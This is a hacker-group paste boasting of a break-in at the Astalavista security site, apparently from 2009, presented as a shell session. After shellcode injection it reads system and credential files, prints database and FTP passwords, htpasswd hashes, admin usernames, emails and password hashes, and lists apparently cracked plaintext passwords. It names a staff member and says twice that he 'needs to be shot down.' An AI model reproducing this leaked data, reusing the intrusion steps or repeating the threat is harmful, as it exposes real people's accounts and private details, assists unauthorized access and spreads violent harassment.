Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- / _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
- / /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
- / | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
- \____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
- \/ \/ \/ \/ \/ \/ \/
- The Hacking & Security Community
- [+] Founded in 1997 by a hacker computer enthusiast
- [-] Exposed in 2009 by anti-sec group
- From < http://astalavista.com/faq>:
- >> 03. Who's behind the site?
- >>
- >> A team of security and IT professionals, and a countless number of contributors from all over the world.
- >> 05. Is it true that the site is visited by script-kiddies and warez fans only?
- >>
- >> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
- military institutions.
- >> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
- Why has Astalavista been targeted?
- Other than the fact that they are not doing any of this for the "community" but
- for the money, they spread exploits for kids, claim to be a security community
- (with no real sense of security on their own servers), and they charge you $6.66
- per months to access a dead forum with a directory filled with public releases
- and outdated / broken services.
- We wanted to see how good that "team of security and IT professionals" really is.
- Let's begin.
- anti-sec:~# ./g0tshell astalavista.com -p 80
- [+] Connecting to astalavista.com:80
- [+] Grabbing banner...
- LiteSpeed
- [+] Injecting shellcode...
- [-] Wait for it
- [~] We g0tshell
- uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
- ID: uid=100(apache) gid=500(apache) groups=500(apache)
- sh-3.2$ cat /etc/passwd
- root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- news:x:9:13:news:/etc/news:
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- rpm:x:37:37::/var/lib/rpm:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- pcap:x:77:77::/var/arpwatch:/sbin/nologin
- named:x:25:25:Named:/var/named:/sbin/nologin
- apache:x:100:500::/var/www:/bin/false
- diradmin:x:101:101::/usr/local/directadmin:/bin/bash
- mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
- webapps:x:500:501::/var/www/html:/bin/bash
- majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
- admin:x:501:502::/home/admin:/bin/bash
- jon:x:502:503::/home/jon:/bin/bash
- com:x:503:504::/home/com:/bin/bash
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin
- astanet:x:504:505::/home/astanet:/bin/bash
- avahi:x:70:70:Avahi daemon:/:/sbin/nologin
- avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
- sh-3.2$ cat /etc/hosts
- # Do not remove the following line, or various programs
- # that require network functionality will fail.
- 127.0.0.1 localhost.localdomain localhost
- ::1 localhost6.localdomain6 localhost6
- 80.74.154.172 asta1.astalavistaserver.com
- sh-3.2$ pwd
- /home/com/public_html
- sh-3.2$ ls -la
- total 18460
- drwxr-xr-x 30 com apache 4096 May 28 17:06 .
- drwx--x--x 11 com com 4096 Jun 25 2008 ..
- drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
- drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
- drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
- drwxrwxrwx 2 com com 4096 May 19 00:50 config
- drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
- drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
- drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
- drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
- drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
- -rw-r--r-- 1 com com 8035 May 19 14:26 directory_to_mediadir.php
- drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
- drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
- -rw-r--r-- 1 com com 3750 Feb 27 16:12 favicon.ico
- drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
- -rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
- -rw-r--r-- 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
- -rw-r--r-- 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
- drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
- drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
- -rw-r--r-- 1 com com 97496 Jun 2 13:01 index.php
- drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
- drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
- drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
- drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
- drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
- drwxr-xr-x 34 com com 4096 May 28 16:30 modules
- drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
- drwxrwxr-x 22 com com 4096 May 28 17:06 _new
- drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
- drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
- drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
- -rw-r--r-- 1 com com 26 Feb 2 19:33 robots.txt
- -rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
- -rw-r--r-- 1 com com 223 Mar 30 15:32 test.php
- drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
- drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
- drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
- sh-3.2$ head -20 index.php
- <?php
- /**
- * The main page for the CMS
- * @copyright CONTREXX CMS - COMVATION AG
- * @author Comvation Development Team
- * @version v1.0.9.10.1 stable
- * @package contrexx
- * @subpackage core
- * @link http://www.contrexx.com/ contrexx homepage
- * @since v0.0.0.0
- * @todo Capitalize all class names in project
- * @uses /config/configuration.php
- * @uses /config/settings.php
- * @uses /config/version.php
- * @uses /core/API.php
- * @uses /core_modules/cache/index.class.php
- * @uses /core/error.class.php
- * @uses /core_modules/banner/index.class.php
- * @uses /core_modules/contact/index.class.php
- sh-3.2$ cd config/
- sh-3.2$ ls -la
- total 32
- drwxrwxrwx 2 com com 4096 May 19 00:50 .
- drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
- -rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
- -rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
- -rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
- -rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
- sh-3.2$ cat configuration.php
- [snip]
- $_DBCONFIG['host'] = 'localhost'; // This is normally set to localhost
- $_DBCONFIG['database'] = 'com_contrexx2_live'; // Database name
- $_DBCONFIG['tablePrefix'] = 'contrexx_'; // Database table prefix
- $_DBCONFIG['user'] = 'contrexxuser2'; // Database username
- $_DBCONFIG['password'] = '0fEYNZgXz1pKe'; // Database password
- $_DBCONFIG['dbType'] = 'mysql'; // Database type (e.g. mysql,postgres ..)
- $_DBCONFIG['charset'] = 'utf8'; // Charset (default, latin1, utf8, ..)
- [snip]
- $_FTPCONFIG['is_activated'] = true; // Ftp support true or false
- $_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
- $_FTPCONFIG['host'] = 'localhost';// This is normally set to localhost
- $_FTPCONFIG['port'] = 21; // Ftp remote port
- $_FTPCONFIG['username'] = 'dev@astalavista.com'; // Ftp login username
- $_FTPCONFIG['password'] = 'jajklop0Iuj'; // Ftp login password
- $_FTPCONFIG['path'] = '/'; // Ftp path to cms
- sh-3.2$ cd ..
- sh-3.2$ cd dvd/
- sh-3.2$ ls -la
- total 2913780
- drwxr-xr-x 2 com com 4096 Sep 9 2008 .
- drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
- -rw-r--r-- 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
- -rw-r--r-- 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
- -rw-r--r-- 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
- -rw-r--r-- 1 com com 115 Jan 29 2008 .htaccess
- sh-3.2$ cat .htaccess
- authType Basic
- authName DVD
- authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
- require valid-user
- sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
- DVDdownload:CRD8cuY6.MPT6
- DVDdownload2:CR8a36.wluFMg
- sh-3.2$ cat test.php
- <?php
- $url = 'aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D';
- $url = str_replace(array('&', '&'), '&', base64_decode(rawurldecode($url)));
- echo $url;
- ?>
- sh-3.2$ cd modifications/
- sh-3.2$ ls -la
- total 32
- drwxr-xr-x 8 com com 4096 May 11 12:48 .
- drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
- drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
- drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
- drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
- drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
- drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
- drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
- sh-3.2$ ls -R
- .:
- com_avtng cronjobs onlinetools pjirc search _tmp
- ./com_avtng:
- avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
- ./com_avtng/scripts:
- popunder.js
- ./cronjobs:
- exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
- ./cronjobs/tmp:
- contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
- ./onlinetools:
- index.php
- ./pjirc:
- a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
- AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
- background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
- ./pjirc/img:
- ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
- arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
- verre-eau.gif
- argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
- verre-vin.gif
- ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
- biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
- ./pjirc/snd:
- bell2.au ding.au
- ./search:
- searchEngines.php search.php
- ./_tmp:
- defaultPorts.php defaultPorts.txt
- sh-3.2$ cd cronjobs/
- sh-3.2$ cat exploits.php
- [snip]
- $categories = array();
- $milw0rmFile = FULLPATH . '/modifications/cronjobs/tmp/milw0rm/sploitlist.txt';
- $expolits = file($milw0rmFile);
- $comExploits = array();
- [snip]
- // manage data
- for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
- // get path and title
- $expolits[$x] = trim($expolits[$x]);
- $path = str_replace('./', FULLPATH . '/modifications/cronjobs/tmp/milw0rm/', substr($expolits[$x], 0, strpos($expolits[$x], ' ')));
- $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ' ') + 1, strlen($expolits[$x])), ENT_QUOTES);
- // check if file exists
- if (file_exists($path)) {
- $text = file_get_contents($path);
- // get content and date
- //$text = htmlspecialchars($text, ENT_QUOTES);
- $tmptext = addslashes(htmlentities($text, ENT_QUOTES, "UTF-8"));
- if ($tmptext != '') {
- $text = $tmptext;
- } else {
- $text = addslashes(htmlentities($text, ENT_QUOTES));
- }
- $date = str_replace('milw0rm.com [', '', str_replace(']', '', strstr($text, 'milw0rm.com [')));
- $tmp = explode('-', $date);
- $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
- $cat = getCategory ($path);
- $ext = pathinfo(basename($path));
- $ext = $ext['extension'];
- $qStr = "
- SELECT `id`
- FROM `contrexx_module_exploits`
- WHERE `title` = '" . $title . "'
- AND `date` = '" . $date . "'
- ";
- echo $x + 1 . ' von ' . count($expolits) . ' -> ' . $qStr . "\n";
- $q = $_objDB->query($qStr);
- if ($q->numRows() == 0) {
- // prepare array
- $comExploits[$x]['date'] = $date;
- $comExploits[$x]['title'] = $title;
- $comExploits[$x]['author'] = 'milw0rm';
- $comExploits[$x]['text'] = $text;
- $comExploits[$x]['source'] = $ext;
- $comExploits[$x]['url1'] = '';
- $comExploits[$x]['url2'] = '';
- $comExploits[$x]['catid'] = $cat;
- $comExploits[$x]['lang'] = '2';
- $comExploits[$x]['userid'] = '12';
- $comExploits[$x]['startdate'] = '0000-00-00';
- $comExploits[$x]['enddate'] = '0000-00-00';
- $comExploits[$x]['status'] = '1';
- $comExploits[$x]['changelog'] = $date;
- }
- [snip]
- $xml = '<?xml version="1.0" encoding="UTF-8"?>
- <rss version="2.0">
- <channel>
- <title>ASTALAVISTA.com - Exploits</title>
- <link>http://www.astalavista.com/exploits</link>
- <description>All availably Exploits.</description>
- <language>en-us</language>
- <lastBuildDate>' . date('F, j M Y H:i:s O') . '</lastBuildDate>
- <docs>http://blogs.law.harvard.edu/tech/rss</docs>
- <generator>Astalavista.com</generator>
- <webMaster>info@astalavista.com</webMaster>' . $items . '
- </channel>
- </rss>';
- if (file_exists(FULLPATH . '/feed/exploits.xml')) {
- unlink (FULLPATH . '/feed/exploits.xml');
- }
- file_put_contents(FULLPATH . '/feed/exploits.xml', $xml);
- [snip]
- sh-3.2$ cat exploits.sh
- #!/bin/sh
- ###########################################################
- # #
- # Title: milw0rm exploits adder #
- # Description: Add all milw0rm exploits to the #
- # Astalavista.com database #
- # #
- # Company: Astalavista Group #
- # Author: Paulo M. Santos #
- # E-Mail: paulo.santos@astalavista.ch #
- # #
- ###########################################################
- # path
- this_path=/home/com/public_html/modifications/cronjobs
- # change directory
- cd $this_path
- cd tmp/
- # delete files
- rm -rf milw0rm.tar.* &
- rm -rf milw0rm/ &
- # wget milw0rm paket
- wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2
- # extract milw0rm paket
- tar -xvf milw0rm.tar.bz2
- # change owner
- chown -R com .
- chgrp -R com .
- # execute php script
- cd $this_path
- php -q exploits.php
- # delete files
- rm -rf tmp/milw0rm.tar.*
- rm -rf tmp/milw0rm/
- sh-3.2$ echo "Paulo M. Santos needs to be shot down."
- Paulo M. Santos needs to be shot down.
- mysql -u contrexxuser2 -p
- Enter password:
- Welcome to the MySQL monitor. Commands end with ; or \g.
- Your MySQL connection id is 261694
- Server version: 5.0.45-community-log MySQL Community Edition (GPL)
- Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
- mysql> show databases;
- +--------------------+
- | Database |
- +--------------------+
- | information_schema |
- | com_contrexx2 |
- | com_contrexx2_live |
- | test |
- +--------------------+
- 4 rows in set (0.00 sec)
- mysql> use com_contrexx2_live
- Database changed
- mysql> show tables;
- +--------------------------------------------------+
- | Tables_in_com_contrexx2_live |
- +--------------------------------------------------+
- | cc_banner_counter |
- | cc_search_counter |
- | contrexx_access_group_dynamic_ids |
- | contrexx_access_group_static_ids |
- | contrexx_access_rel_user_group |
- | contrexx_access_settings |
- | contrexx_access_user_attribute |
- | contrexx_access_user_attribute_name |
- | contrexx_access_user_attribute_value |
- | contrexx_access_user_core_attribute |
- | contrexx_access_user_groups |
- | contrexx_access_user_mail |
- | contrexx_access_user_profile |
- | contrexx_access_user_title |
- | contrexx_access_user_validity |
- | contrexx_access_users |
- | contrexx_backend_areas |
- | contrexx_backups |
- | contrexx_content |
- | contrexx_content_history |
- | contrexx_content_logfile |
- | contrexx_content_navigation |
- | contrexx_content_navigation_history |
- | contrexx_ids |
- | contrexx_languages |
- | contrexx_lib_country |
- | contrexx_log |
- | contrexx_module_alias_source |
- | contrexx_module_alias_target |
- | contrexx_module_block_blocks |
- | contrexx_module_block_rel_lang |
- | contrexx_module_block_rel_pages |
- | contrexx_module_block_settings |
- | contrexx_module_blog_categories |
- | contrexx_module_blog_comments |
- | contrexx_module_blog_message_to_category |
- | contrexx_module_blog_messages |
- | contrexx_module_blog_messages_lang |
- | contrexx_module_blog_networks |
- | contrexx_module_blog_networks_lang |
- | contrexx_module_blog_settings |
- | contrexx_module_blog_votes |
- | contrexx_module_calendar |
- | contrexx_module_calendar_access |
- | contrexx_module_calendar_categories |
- | contrexx_module_calendar_form_data |
- | contrexx_module_calendar_form_fields |
- | contrexx_module_calendar_registrations |
- | contrexx_module_calendar_settings |
- | contrexx_module_calendar_style |
- | contrexx_module_contact_form |
- | contrexx_module_contact_form_data |
- | contrexx_module_contact_form_field |
- | contrexx_module_contact_settings |
- | contrexx_module_data_categories |
- | contrexx_module_data_message_to_category |
- | contrexx_module_data_messages |
- | contrexx_module_data_messages_lang |
- | contrexx_module_data_placeholders |
- | contrexx_module_data_settings |
- | contrexx_module_directory_access |
- | contrexx_module_directory_categories |
- | contrexx_module_directory_dir |
- | contrexx_module_directory_inputfields |
- | contrexx_module_directory_levels |
- | contrexx_module_directory_mail |
- | contrexx_module_directory_rel_dir_cat |
- | contrexx_module_directory_rel_dir_level |
- | contrexx_module_directory_settings |
- | contrexx_module_directory_settings_google |
- | contrexx_module_directory_vote |
- | contrexx_module_docsys |
- | contrexx_module_docsys_categories |
- | contrexx_module_egov_configuration |
- | contrexx_module_egov_orders |
- | contrexx_module_egov_product_calendar |
- | contrexx_module_egov_product_fields |
- | contrexx_module_egov_products |
- | contrexx_module_egov_settings |
- | contrexx_module_exploits |
- | contrexx_module_exploits_categories |
- | contrexx_module_feed_category |
- | contrexx_module_feed_news |
- | contrexx_module_feed_newsml_association |
- | contrexx_module_feed_newsml_categories |
- | contrexx_module_feed_newsml_documents |
- | contrexx_module_feed_newsml_providers |
- | contrexx_module_forum_access |
- | contrexx_module_forum_categories |
- | contrexx_module_forum_categories_lang |
- | contrexx_module_forum_notification |
- | contrexx_module_forum_postings |
- | contrexx_module_forum_rating |
- | contrexx_module_forum_settings |
- | contrexx_module_forum_statistics |
- | contrexx_module_gallery_categories |
- | contrexx_module_gallery_comments |
- | contrexx_module_gallery_language |
- | contrexx_module_gallery_language_pics |
- | contrexx_module_gallery_pictures |
- | contrexx_module_gallery_settings |
- | contrexx_module_gallery_votes |
- | contrexx_module_guestbook |
- | contrexx_module_guestbook_settings |
- | contrexx_module_livecam |
- | contrexx_module_livecam_settings |
- | contrexx_module_market |
- | contrexx_module_market_access |
- | contrexx_module_market_categories |
- | contrexx_module_market_mail |
- | contrexx_module_market_paypal |
- | contrexx_module_market_settings |
- | contrexx_module_market_spez_fields |
- | contrexx_module_mediadir_access |
- | contrexx_module_mediadir_categories |
- | contrexx_module_mediadir_comments |
- | contrexx_module_mediadir_dir |
- | contrexx_module_mediadir_inputfields |
- | contrexx_module_mediadir_levels |
- | contrexx_module_mediadir_mail |
- | contrexx_module_mediadir_rel_dir_cat |
- | contrexx_module_mediadir_rel_dir_level |
- | contrexx_module_mediadir_reports |
- | contrexx_module_mediadir_settings |
- | contrexx_module_mediadir_settings_google |
- | contrexx_module_mediadir_vote |
- | contrexx_module_memberdir_directories |
- | contrexx_module_memberdir_name |
- | contrexx_module_memberdir_settings |
- | contrexx_module_memberdir_values |
- | contrexx_module_nettools_allowed_groups |
- | contrexx_module_nettools_settings |
- | contrexx_module_news |
- | contrexx_module_news_access |
- | contrexx_module_news_categories |
- | contrexx_module_news_settings |
- | contrexx_module_news_teaser_frame |
- | contrexx_module_news_teaser_frame_templates |
- | contrexx_module_news_ticker |
- | contrexx_module_newsletter |
- | contrexx_module_newsletter_attachment |
- | contrexx_module_newsletter_category |
- | contrexx_module_newsletter_confirm_mail |
- | contrexx_module_newsletter_rel_cat_news |
- | contrexx_module_newsletter_rel_user_cat |
- | contrexx_module_newsletter_settings |
- | contrexx_module_newsletter_template |
- | contrexx_module_newsletter_tmp_sending |
- | contrexx_module_newsletter_user |
- | contrexx_module_newsletter_user_title |
- | contrexx_module_onlinetools_defaultports |
- | contrexx_module_onlinetools_defaultports_back |
- | contrexx_module_onlinetools_geolitecity_blocks |
- | contrexx_module_onlinetools_geolitecity_country |
- | contrexx_module_onlinetools_geolitecity_location |
- | contrexx_module_podcast_category |
- | contrexx_module_podcast_medium |
- | contrexx_module_podcast_rel_category_lang |
- | contrexx_module_podcast_rel_medium_category |
- | contrexx_module_podcast_settings |
- | contrexx_module_podcast_template |
- | contrexx_module_proxydb |
- | contrexx_module_recommend |
- | contrexx_module_repository |
- | contrexx_module_securitynews_cats |
- | contrexx_module_securitynews_feeds |
- | contrexx_module_securitynews_news |
- | contrexx_module_shop_categories |
- | contrexx_module_shop_config |
- | contrexx_module_shop_countries |
- | contrexx_module_shop_currencies |
- | contrexx_module_shop_customers |
- | contrexx_module_shop_importimg |
- | contrexx_module_shop_lsv |
- | contrexx_module_shop_mail |
- | contrexx_module_shop_mail_content |
- | contrexx_module_shop_manufacturer |
- | contrexx_module_shop_order_items |
- | contrexx_module_shop_order_items_attributes |
- | contrexx_module_shop_orders |
- | contrexx_module_shop_payment |
- | contrexx_module_shop_payment_processors |
- | contrexx_module_shop_pricelists |
- | contrexx_module_shop_products |
- | contrexx_module_shop_products_attributes |
- | contrexx_module_shop_products_attributes_name |
- | contrexx_module_shop_products_attributes_value |
- | contrexx_module_shop_products_downloads |
- | contrexx_module_shop_rel_countries |
- | contrexx_module_shop_rel_payment |
- | contrexx_module_shop_rel_shipment |
- | contrexx_module_shop_shipment_cost |
- | contrexx_module_shop_shipper |
- | contrexx_module_shop_vat |
- | contrexx_module_shop_zones |
- | contrexx_module_u2u_address_list |
- | contrexx_module_u2u_message_log |
- | contrexx_module_u2u_sent_messages |
- | contrexx_module_u2u_settings |
- | contrexx_module_u2u_user_log |
- | contrexx_modules |
- | contrexx_sessions |
- | contrexx_settings |
- | contrexx_settings_smtp |
- | contrexx_skins |
- | contrexx_stats_browser |
- | contrexx_stats_colourdepth |
- | contrexx_stats_config |
- | contrexx_stats_country |
- | contrexx_stats_hostname |
- | contrexx_stats_javascript |
- | contrexx_stats_operatingsystem |
- | contrexx_stats_referer |
- | contrexx_stats_requests |
- | contrexx_stats_requests_summary |
- | contrexx_stats_screenresolution |
- | contrexx_stats_search |
- | contrexx_stats_spiders |
- | contrexx_stats_spiders_summary |
- | contrexx_stats_visitors |
- | contrexx_stats_visitors_summary |
- | contrexx_voting_additionaldata |
- | contrexx_voting_email |
- | contrexx_voting_rel_email_system |
- | contrexx_voting_results |
- | contrexx_voting_system |
- | foo |
- +--------------------------------------------------+
- 227 rows in set (0.01 sec)
- mysql> select count(*) as skids from contrexx_access_users;
- +-------+
- | skids |
- +-------+
- | 53699 |
- +-------+
- 1 row in set (0.00 sec)
- mysql> describe contrexx_access_users;
- +------------------+------------------------------------------+------+-----+--------------+----------------+
- | Field | Type | Null | Key | Default | Extra |
- +------------------+------------------------------------------+------+-----+--------------+----------------+
- | id | int(10) unsigned | NO | PRI | NULL | auto_increment |
- | is_admin | tinyint(1) unsigned | NO | | 0 | |
- | username | varchar(40) | YES | MUL | NULL | |
- | password | varchar(32) | YES | | NULL | |
- | regdate | int(14) unsigned | NO | | 0 | |
- | expiration | int(14) unsigned | NO | | 0 | |
- | validity | int(10) unsigned | NO | | 0 | |
- | last_auth | int(14) unsigned | NO | | 0 | |
- | last_activity | int(14) unsigned | NO | | 0 | |
- | email | varchar(255) | YES | | NULL | |
- | email_access | enum('everyone','members_only','nobody') | NO | | nobody | |
- | frontend_lang_id | int(2) unsigned | NO | | 0 | |
- | backend_lang_id | int(2) unsigned | NO | | 0 | |
- | active | tinyint(1) | NO | | 0 | |
- | profile_access | enum('everyone','members_only','nobody') | NO | | members_only | |
- | restore_key | varchar(32) | NO | | | |
- | restore_key_time | int(14) unsigned | NO | | 0 | |
- | u2u_active | enum('0','1') | NO | | 1 | |
- +------------------+------------------------------------------+------+-----+--------------+----------------+
- 18 rows in set (0.00 sec)
- mysql> select username,password,email from contrexx_access_users where is_admin = 1;
- +------------+----------------------------------+-----------------------------+
- | username | password | email |
- +------------+----------------------------------+-----------------------------+
- | system | 0defe9e458e745625fffbc215d7801c5 | info@comvation.com |
- | prozac | 1f65f06d9758599e9ad27cf9707f92b5 | prozac@astalavista.com |
- | Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | paulo.santos@astalavista.ch |
- | schmid | 0defe9e458e745625fffbc215d7801c5 | ivan.schmid@comvation.com |
- +------------+----------------------------------+-----------------------------+
- 4 rows in set (0.04 sec)
- mysql> exit;
- Bye
- [~] There you go, your "team of security and IT professionals" is a joke.
- +------------------------------+
- system:f82BN3+_*
- Be1er0ph0r:belerophor4astacom
- prozac:asta4cms!
- commander:mpbdaagf6m
- sykadul:ak29eral
- +------------------------------+
- [~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
- ...and the others, find another area to get paid from, security isn't for sale and you obviously fail at it.
- [~] Lets move to astalavista.net now,
- From <https://www.astalavista.net/>:
- >> Everyone knows that the best defense is a good offense.
- >> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
- >> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
- >> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking."
- >> Go ahead, try and hack our server . in a completely legal way!
- >> Learn by doing: We offer our members tricky tasks and challenges on an
- >> ongoing basis so you can test your knowledge and abilities. You can also
- >> demonstrate what you.ve mastered by taking part in regular hacker contests
- >> and war games
- [~] Lets take a look there, after all... they are hack-proof, aren't they?!
- [-] Tricky task: Find home dir of astalavista.net
- sh-3.2$ ls -la ~astanet
- total 48
- drwx--x--x 6 astanet astanet 4096 Dec 23 15:55 .
- drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
- drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
- -rw------- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
- -rw-r--r-- 1 astanet astanet 33 Dec 17 21:50 .bash_logout
- -rw-r--r-- 1 astanet astanet 176 Dec 17 21:50 .bash_profile
- -rw-r--r-- 1 astanet astanet 124 Dec 17 21:50 .bashrc
- drwx--x--x 3 astanet astanet 4096 Dec 23 12:18 domains
- drwxrwx--- 3 astanet mail 4096 Dec 23 12:18 imap
- drwx------ 2 astanet astanet 4096 Dec 23 12:18 mail
- lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
- -rw-r----- 1 astanet mail 34 Dec 22 12:41 .shadow
- sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
- sh-3.2$ ls -la
- total 200
- drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 .
- drwx--x--x 8 astanet astanet 4096 Dec 23 13:53 ..
- drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
- drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
- drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 astanet@astalavista.com
- drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
- drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
- -rw-r--r-- 1 astanet astanet 25724 Apr 4 2006 banner.jpg
- drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
- drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
- drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
